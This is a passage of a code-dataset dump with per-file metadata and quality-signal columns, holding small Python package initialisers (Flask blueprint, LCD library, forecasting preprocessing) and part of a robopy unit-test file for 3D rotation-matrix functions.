hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | 
qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ffdc73fd40b7e3f26a71711d0393b4951fcf7276 | 112 | py | Python | clover/index/__init__.py | JCL2017/clover | d074e5038c6a1a6b0333b14ff45bb35ac290f90f | [
"Apache-2.0"
] | 18 | 2019-07-01T04:49:33.000Z | 2022-03-11T03:15:09.000Z | clover/index/__init__.py | JCL2017/clover | d074e5038c6a1a6b0333b14ff45bb35ac290f90f | [
"Apache-2.0"
] | 64 | 2019-11-20T09:33:21.000Z | 2021-11-16T06:34:32.000Z | clover/index/__init__.py | JCL2017/clover | d074e5038c6a1a6b0333b14ff45bb35ac290f90f | [
"Apache-2.0"
] | 9 | 2019-10-18T08:28:26.000Z | 2020-05-25T15:38:12.000Z | #coding=utf-8
from flask import Blueprint
index = Blueprint('index', __name__)
from clover.index import views | 16 | 36 | 0.776786 | 16 | 112 | 5.1875 | 0.6875 | 0.337349 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010309 | 0.133929 | 112 | 7 | 37 | 16 | 0.845361 | 0.107143 | 0 | 0 | 0 | 0 | 0.05 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0.666667 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 6 |
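The clover content above is a typical Flask blueprint package __init__: it creates the `index` Blueprint and imports the views module last to avoid a circular import. A hedged sketch of how such a blueprint is usually wired into an app (the create_app factory below is illustrative, not clover's actual code):

    from flask import Flask
    from clover.index import index

    def create_app():
        app = Flask(__name__)
        # Registration attaches the routes defined in clover.index.views.
        app.register_blueprint(index)
        return app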
ffeabd7cc6e451e0ab93b462fec92e7076be7bff | 34 | py | Python | electricityLoadForecasting/preprocessing/detection/__init__.py | BCD65/electricityLoadForecasting | 07a6ed060afaf7cc2906c0389b5c9e9b0fede193 | [
"MIT"
] | null | null | null | electricityLoadForecasting/preprocessing/detection/__init__.py | BCD65/electricityLoadForecasting | 07a6ed060afaf7cc2906c0389b5c9e9b0fede193 | [
"MIT"
] | null | null | null | electricityLoadForecasting/preprocessing/detection/__init__.py | BCD65/electricityLoadForecasting | 07a6ed060afaf7cc2906c0389b5c9e9b0fede193 | [
"MIT"
] | null | null | null |
from .detection_tools import *
| 6.8 | 30 | 0.735294 | 4 | 34 | 6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.205882 | 34 | 4 | 31 | 8.5 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
083d5ef965afc77d6a863478c2098f0ade7b75f4 | 152 | py | Python | RPLCD/__init__.py | jknofe/pi_monitor | 1424017c8e25ced8fcd42b155d06ef5e14f70b75 | [
"MIT"
] | null | null | null | RPLCD/__init__.py | jknofe/pi_monitor | 1424017c8e25ced8fcd42b155d06ef5e14f70b75 | [
"MIT"
] | null | null | null | RPLCD/__init__.py | jknofe/pi_monitor | 1424017c8e25ced8fcd42b155d06ef5e14f70b75 | [
"MIT"
] | null | null | null | from .lcd import CharLCD
from .lcd import Alignment, CursorMode, ShiftMode
from .contextmanagers import cursor, cleared
from .lcd import BacklightMode
| 25.333333 | 49 | 0.822368 | 19 | 152 | 6.578947 | 0.578947 | 0.168 | 0.312 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.131579 | 152 | 5 | 50 | 30.4 | 0.94697 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
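The RPLCD content above re-exports the CharLCD driver together with the cursor/cleared context managers. A hedged usage sketch (the no-argument constructor relies on the library's default GPIO wiring, which is an assumption; adjust for real hardware):

    from RPLCD import CharLCD, cleared

    lcd = CharLCD()        # default pin mapping is an assumption
    with cleared(lcd):     # clear the display, then write
        lcd.write_string(u'Hello')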
f256c3a85409c1153917a0a440c5ea950f34376a | 58,695 | py | Python | robopy/tests/test_transforms.py | rodosha98/FRPGitHomework | 0905c79ccc28d33f9385c09c03e8e18d8c720787 | [
"MIT"
] | 214 | 2017-10-30T04:36:09.000Z | 2022-03-27T06:05:53.000Z | robopy/tests/test_transforms.py | rodosha98/FRPGitHomework | 0905c79ccc28d33f9385c09c03e8e18d8c720787 | [
"MIT"
] | 16 | 2017-11-28T08:07:04.000Z | 2020-05-12T22:15:10.000Z | robopy/tests/test_transforms.py | rodosha98/FRPGitHomework | 0905c79ccc28d33f9385c09c03e8e18d8c720787 | [
"MIT"
] | 57 | 2017-11-28T02:17:53.000Z | 2021-02-18T14:32:51.000Z | # Created by: Jack Button, Aditya Dua
# 10 June, 2017
import unittest
import numpy as np
from math import pi
from .test_common import matrices_equal, matrix_mismatch_string_builder
from ..base import transforms
# ---------------------------------------------------------------------------------------#
# 3D Transforms
# ---------------------------------------------------------------------------------------#
# angvec2r | ready
# angvec2tr | ready
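# Before the per-function test classes, a minimal reference sketch
# (hypothetical -- not robopy's actual source) of a rotation constructor
# consistent with the expectations encoded below: radians by default,
# degrees via unit='deg', invalid units rejected by an assert, and an
# np.matrix return type.
def rotx_sketch(theta, unit='rad'):
    assert unit in ('rad', 'deg')           # unit=True / unit=5 also fail here
    if unit == 'deg':
        theta = theta * pi / 180
    ct, st = np.cos(theta), np.sin(theta)   # a string angle raises TypeError
    return np.matrix([[1, 0, 0],
                      [0, ct, -st],
                      [0, st, ct]])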
# rotx | complete
class TestRotx(unittest.TestCase):
def test_transforms_3d_rotx_validData_returnDatatype(self):
self.assertIsInstance(transforms.rotx(0), np.matrix)
def test_transforms_3d_rotx_validData_returnData_dimension(self):
dimensions = transforms.rotx(0).shape
self.assertEqual(dimensions, (3, 3))
def test_transforms_3d_rotx_validData_boundaryCondition_0_rad(self):
expected_mat = np.matrix([[1, 0, 0], [0, 1, 0], [0, 0, 1]])
received_mat = transforms.rotx(0)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_rotx_validData_boundaryCondition_pi_by2_rad(self):
expected_mat = np.matrix([[1, 0, 0], [0, 0, -1], [0, 1, 0]])
received_mat = transforms.rotx(pi / 2)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_rotx_validData_boundaryCondition_pi_rad(self):
expected_mat = np.matrix([[1, 0, 0], [0, -1, 0], [0, 0, -1]])
received_mat = transforms.rotx(pi)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_rotx_validData_boundaryCondition_three_pi_by2_rad(self):
expected_mat = np.matrix([[1, 0, 0], [0, 0, 1], [0, -1, 0]])
received_mat = transforms.rotx(3 * pi / 2)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_rotx_validData_boundaryCondition_2pi_rad(self):
expected_mat = np.matrix([[1, 0, 0], [0, 1, 0], [0, 0, 1]])
received_mat = transforms.rotx(2 * pi)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_rotx_validData_boundaryCondition_0_deg(self):
expected_mat = np.matrix([[1, 0, 0], [0, 1, 0], [0, 0, 1]])
received_mat = transforms.rotx(0, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_rotx_validData_boundaryCondition_360_deg(self):
expected_mat = np.matrix([[1, 0, 0], [0, 1, 0], [0, 0, 1]])
received_mat = transforms.rotx(360, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_rotx_validData_boundaryCondition_90_deg(self):
expected_mat = np.matrix([[1, 0, 0], [0, 0, -1], [0, 1, 0]])
received_mat = transforms.rotx(90, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_rotx_validData_boundaryCondition_180_deg(self):
expected_mat = np.matrix([[1, 0, 0], [0, -1, 0], [0, 0, -1]])
received_mat = transforms.rotx(180, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_rotx_validData_boundaryCondition_270_deg(self):
expected_mat = np.matrix([[1, 0, 0], [0, 0, 1], [0, -1, 0]])
received_mat = transforms.rotx(270, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_rotx_validData_boundaryCondition_450_deg(self):
expected_mat = np.matrix([[1, 0, 0], [0, 0, -1], [0, 1, 0]])
received_mat = transforms.rotx(450, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_rotx_invalidData_arg1_string(self):
self.assertRaises(TypeError, transforms.rotx, 'invalid', unit='deg')
def test_transforms_3d_rotx_invalidData_arg2_string_mismatch(self):
self.assertRaises(AssertionError, transforms.rotx,
180, unit='invalid unit')
def test_transforms_3d_rotx_invalidData_arg2_bool(self):
self.assertRaises(AssertionError, transforms.rotx, 180, unit=True)
def test_transforms_3d_rotx_invalidData_arg2_int(self):
self.assertRaises(AssertionError, transforms.rotx, 180, unit=5)
# roty | complete
class Testroty(unittest.TestCase):
def test_transforms_3d_roty_validData_returnDatatype(self):
self.assertIsInstance(transforms.roty(0), np.matrix)
def test_transforms_3d_roty_validData_returnData_dimension(self):
dimensions = transforms.roty(0).shape
self.assertEqual(dimensions, (3, 3))
def test_transforms_3d_roty_validData_boundaryCondition_0_rad(self):
expected_mat = np.matrix([[1, 0, 0], [0, 1, 0], [0, 0, 1]])
received_mat = transforms.roty(0)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_roty_validData_boundaryCondition_pi_by2_rad(self):
expected_mat = np.matrix([[0., 0., 1.], [0, 1, 0.], [-1, 0., 0.]])
received_mat = transforms.roty(pi / 2)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_roty_validData_boundaryCondition_pi_rad(self):
expected_mat = np.matrix([[-1., 0., 0.], [0, 1, 0.], [-0, 0., -1.]])
received_mat = transforms.roty(pi)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_roty_validData_boundaryCondition_three_pi_by2_rad(self):
expected_mat = np.matrix([[-0., 0., -1.], [0, 1, 0.], [1, 0., -0.]])
received_mat = transforms.roty(3 * pi / 2)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_roty_validData_boundaryCondition_2pi_rad(self):
expected_mat = np.matrix([[1, 0, 0], [0, 1, 0], [0, 0, 1]])
received_mat = transforms.roty(2 * pi)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_roty_validData_boundaryCondition_0_deg(self):
expected_mat = np.matrix([[1, 0, 0], [0, 1, 0], [0, 0, 1]])
received_mat = transforms.roty(0, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_roty_validData_boundaryCondition_360_deg(self):
expected_mat = np.matrix([[1, 0, 0], [0, 1, 0], [0, 0, 1]])
received_mat = transforms.roty(360, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_roty_validData_boundaryCondition_90_deg(self):
expected_mat = np.matrix([[0., 0., 1.], [0, 1, 0.], [-1, 0., 0.]])
received_mat = transforms.roty(90, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_roty_validData_boundaryCondition_180_deg(self):
expected_mat = np.matrix([[-1., 0., 0.], [0., 1., 0.], [-0., 0., -1.]])
received_mat = transforms.roty(180, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_roty_validData_boundaryCondition_270_deg(self):
expected_mat = np.matrix([[-0., 0., -1.], [0, 1, 0.], [1, 0., -0.]])
received_mat = transforms.roty(270, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_roty_validData_boundaryCondition_450_deg(self):
expected_mat = np.matrix([[0., 0., 1.], [0, 1, 0.], [-1, 0., 0.]])
received_mat = transforms.roty(450, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_roty_invalidData_arg1_string(self):
self.assertRaises(TypeError, transforms.roty, 'invalid', unit='deg')
def test_transforms_3d_roty_invalidData_arg2_string_mismatch(self):
self.assertRaises(AssertionError, transforms.roty,
180, unit='invalid unit')
def test_transforms_3d_roty_invalidData_arg2_bool(self):
self.assertRaises(AssertionError, transforms.roty, 180, unit=True)
def test_transforms_3d_roty_invalidData_arg2_int(self):
self.assertRaises(AssertionError, transforms.roty, 180, unit=5)
# rotz | complete
class Testrotz(unittest.TestCase):
def test_transforms_3d_rotz_validData_returnDatatype(self):
self.assertIsInstance(transforms.rotz(0), np.matrix)
def test_transforms_3d_rotz_validData_returnData_dimension(self):
dimensions = transforms.rotz(0).shape
self.assertEqual(dimensions, (3, 3))
def test_transforms_3d_rotz_validData_boundaryCondition_0_rad(self):
expected_mat = np.matrix([[1, 0, 0], [0, 1, 0], [0, 0, 1]])
received_mat = transforms.rotz(0)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_rotz_validData_boundaryCondition_pi_by2_rad(self):
expected_mat = np.matrix([[0., -1., 0.], [1, 0, 0.], [0, 0., 1.]])
received_mat = transforms.rotz(pi / 2)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_rotz_validData_boundaryCondition_pi_rad(self):
expected_mat = np.matrix([[-1., -0., 0.], [0, -1, 0.], [0, 0., 1.]])
received_mat = transforms.rotz(pi)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_rotz_validData_boundaryCondition_three_pi_by2_rad(self):
expected_mat = np.matrix([[-0., 1., 0.], [-1, -0, 0.], [0, 0., 1.]])
received_mat = transforms.rotz(3 * pi / 2)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_rotz_validData_boundaryCondition_2pi_rad(self):
expected_mat = np.matrix([[1., 0., 0.], [-0, 1, 0.], [0, 0., 1.]])
received_mat = transforms.rotz(2 * pi)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_rotz_validData_boundaryCondition_0_deg(self):
expected_mat = np.matrix([[1, 0, 0], [0, 1, 0], [0, 0, 1]])
received_mat = transforms.rotz(0, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_rotz_validData_boundaryCondition_360_deg(self):
expected_mat = np.matrix([[1, 0, 0], [0, 1, 0], [0, 0, 1]])
received_mat = transforms.rotz(360, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_rotz_validData_boundaryCondition_90_deg(self):
expected_mat = np.matrix([[0., -1., 0.], [1, 0, 0.], [0, 0., 1.]])
received_mat = transforms.rotz(90, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_rotz_validData_boundaryCondition_180_deg(self):
expected_mat = np.matrix([[-1., -0., 0.], [0, -1, 0.], [0, 0., 1.]])
received_mat = transforms.rotz(180, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_rotz_validData_boundaryCondition_270_deg(self):
expected_mat = np.matrix([[-0., 1., 0.], [-1, -0, 0.], [0, 0., 1.]])
received_mat = transforms.rotz(270, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_rotz_validData_boundaryCondition_450_deg(self):
expected_mat = np.matrix([[0., -1., 0.], [1, 0, 0.], [0, 0., 1.]])
received_mat = transforms.rotz(450, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_rotz_invalidData_arg1_string(self):
self.assertRaises(TypeError, transforms.rotz, 'invalid', unit='deg')
def test_transforms_3d_rotz_invalidData_arg2_string_mismatch(self):
self.assertRaises(AssertionError, transforms.rotz,
180, unit='invalid unit')
def test_transforms_3d_rotz_invalidData_arg2_bool(self):
self.assertRaises(AssertionError, transforms.rotz, 180, unit=True)
def test_transforms_3d_rotz_invalidData_arg2_int(self):
self.assertRaises(AssertionError, transforms.rotz, 180, unit=5)
# trotx | complete
class Testtrotx(unittest.TestCase):
def test_transforms_3d_trotx_validData_returnDatatype(self):
self.assertIsInstance(transforms.trotx(0), np.matrix)
def test_transforms_3d_trotx_validData_returnData_dimension(self):
dimensions = transforms.trotx(0).shape
self.assertEqual(dimensions, (4, 4))
def test_transforms_3d_trotx_validData_boundaryCondition_0_rad(self):
expected_mat = np.matrix([[1., 0., 0., 0.], [0., 1., -0., 0.], [0., 0., 1., 0.], [0., 0., 0., 1.]])
received_mat = transforms.trotx(0)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_trotx_validData_boundaryCondition_pi_by2_rad(self):
expected_mat = np.matrix([[1., 0., 0., 0.], [0., 0., -1., 0.], [0., 1., 0., 0.], [0., 0., 0., 1.]])
received_mat = transforms.trotx(pi / 2)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_trotx_validData_boundaryCondition_pi_rad(self):
expected_mat = np.matrix([[1., 0., 0., 0.], [0., -1., -0., 0.], [0., 0., -1., 0.], [0., 0., 0., 1.]])
received_mat = transforms.trotx(pi)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_trotx_validData_boundaryCondition_three_pi_by2_rad(self):
expected_mat = np.matrix([[1., 0., 0., 0.], [0., -0., 1., 0.], [0., -1., -0., 0.], [0., 0., 0., 1.]])
received_mat = transforms.trotx(3 * pi / 2)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_trotx_validData_boundaryCondition_2pi_rad(self):
expected_mat = np.matrix([[1., 0., 0., 0.], [0., 1., 0., 0.], [0., -0., 1., 0.], [0., 0., 0., 1.]])
received_mat = transforms.trotx(2 * pi)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_trotx_validData_boundaryCondition_0_deg(self):
expected_mat = np.matrix([[1., 0., 0., 0.], [0., 1., -0., 0.], [0., 0., 1., 0.], [0., 0., 0., 1.]])
received_mat = transforms.trotx(0, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_trotx_validData_boundaryCondition_360_deg(self):
expected_mat = np.matrix([[1., 0., 0., 0.], [0., 1., 0., 0.], [0., -0., 1., 0.], [0., 0., 0., 1.]])
received_mat = transforms.trotx(360, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_trotx_validData_boundaryCondition_90_deg(self):
expected_mat = np.matrix([[1., 0., 0., 0.], [0., 0., -1., 0.], [0., 1., 0., 0.], [0., 0., 0., 1.]])
received_mat = transforms.trotx(90, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_trotx_validData_boundaryCondition_180_deg(self):
expected_mat = np.matrix([[1., 0., 0., 0.], [0., -1., -0., 0.], [0., 0., -1., 0.], [0., 0., 0., 1.]])
received_mat = transforms.trotx(180, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_trotx_validData_boundaryCondition_270_deg(self):
expected_mat = np.matrix([[1., 0., 0., 0.], [0., -0., 1., 0.], [0., -1., -0., 0.], [0., 0., 0., 1.]])
received_mat = transforms.trotx(270, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_trotx_validData_boundaryCondition_450_deg(self):
expected_mat = np.matrix([[1., 0., 0., 0.], [0., 0., -1., 0.], [0., 1., 0., 0.], [0., 0., 0., 1.]])
received_mat = transforms.trotx(450, unit='deg')
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_trotx_invalidData_arg1_string(self):
self.assertRaises(TypeError, transforms.trotx, 'invalid', unit='deg')
def test_transforms_3d_trotx_invalidData_arg2_string_mismatch(self):
self.assertRaises(AssertionError, transforms.trotx,
180, unit='invalid unit')
def test_transforms_3d_trotx_invalidData_arg2_bool(self):
self.assertRaises(AssertionError, transforms.trotx, 180, unit=True)
def test_transforms_3d_trotx_invalidData_arg2_int(self):
self.assertRaises(AssertionError, transforms.trotx, 180, unit=5)
# troty | complete
class Testtroty(unittest.TestCase):
def test_transforms_3d_troty_validData_returnDatatype(self):
self.assertIsInstance(transforms.troty(0), np.matrix)
def test_transforms_3d_troty_validData_returnData_dimension(self):
dimensions = transforms.troty(0).shape
self.assertEqual(dimensions, (4, 4))
def test_transforms_3d_troty_validData_boundaryCondition_0_rad(self):
expected_mat = np.matrix([[1., 0., 0., 0.], [0., 1., 0., 0.], [-0., 0., 1., 0.], [0., 0., 0., 1.]])
received_mat = transforms.troty(0)
if not matrices_equal(received_mat, expected_mat, ):
output_str = matrix_mismatch_string_builder(
expected_mat, received_mat)
self.fail(output_str)
def test_transforms_3d_troty_validData_boundaryCondition_pi_by2_rad(self):
expected_mat = np.matrix([[0., 0., 1., 0.], [0., 1., 0., 0.], [-1., 0., 0., 0.], [0., 0., 0., 1.]])
